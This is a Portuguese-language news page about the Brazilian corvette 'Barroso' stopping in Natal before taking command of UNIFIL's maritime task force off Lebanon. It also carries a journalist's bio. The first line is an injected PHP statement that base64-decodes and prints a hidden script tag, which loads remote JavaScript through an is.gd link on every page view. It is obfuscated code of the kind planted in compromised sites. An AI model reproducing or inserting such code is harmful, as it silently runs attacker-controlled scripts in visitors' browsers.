$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Corveta “Barroso” atraca no Porto de Natal antes de seguir para Missão de Paz no Líbano

Corveta “Barroso” atraca no Porto de Natal antes de seguir para Missão de Paz no Líbano
09 Ago 2019

A Corveta “Barroso”, da Marinha do Brasil, atracou no porto de Natal, nesta quinta-feira, e permanecerá na cidade até domingo, quando seguirá para atuar como Navio Capitânia da Força-Tarefa Marítima (FTM), da Força Interina das Nações Unidas no Líbano (UNIFIL), missão de paz da Organização das Nações Unidas (ONU). Os interessados podem visitá-la, com entrada pelo Terminal Marítimo de Passageiros, na Ribeira, neste sábado (10), das 14h às 17h.

O navio deixou a Base Naval do Rio de Janeiro no dia 4 de agosto, e, além de Natal, realizará escalas logísticas em Funchal (Portugal) e Toulon (França), com previsão de chegada em Beirute (Líbano) no dia 7 de setembro. A partir de 15 de setembro, a Corveta integrará a FTM-UNIFIL em substituição à Fragata “União”, que participa da operação desde março deste ano.

Em setembro de 2015, a Corveta Barroso notabilizou-se ao resgatar 220 refugiados no Mar Mediterrâneo, que se encontravam à deriva em uma embarcação precária a cerca de 300 quilômetros da Sicília. Tal ato mostrou ao mundo a competência, a humanidade e a solidariedade daqueles que realizam esta tarefa gloriosa de prover a paz.

A FTM-UNIFIL realiza operações de interdição marítima na costa a fim de impedir a entrada não autorizada de armas pelo mar em território libanês. Outro aspecto importante da missão é contribuir para o treinamento da Marinha do Líbano, com o objetivo de capacitar a Força Naval do país para a execução independente de tarefas de segurança marítima.

A UNIFIL foi criada pela Organização das Nações Unidas em 1978 e conta, atualmente, com a participação de diversos países, incluindo o Brasil, e com aproximadamente 12 mil militares e policiais, além de funcionários civis. No dia 29 de setembro de 2011, a Marinha do Brasil (MB) foi autorizada pelo Congresso Nacional a enviar um navio para integrar a FTM da UNIFIL. A presença do navio brasileiro naquela região contribui para a garantia da paz e da segurança no Sul do Líbano.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *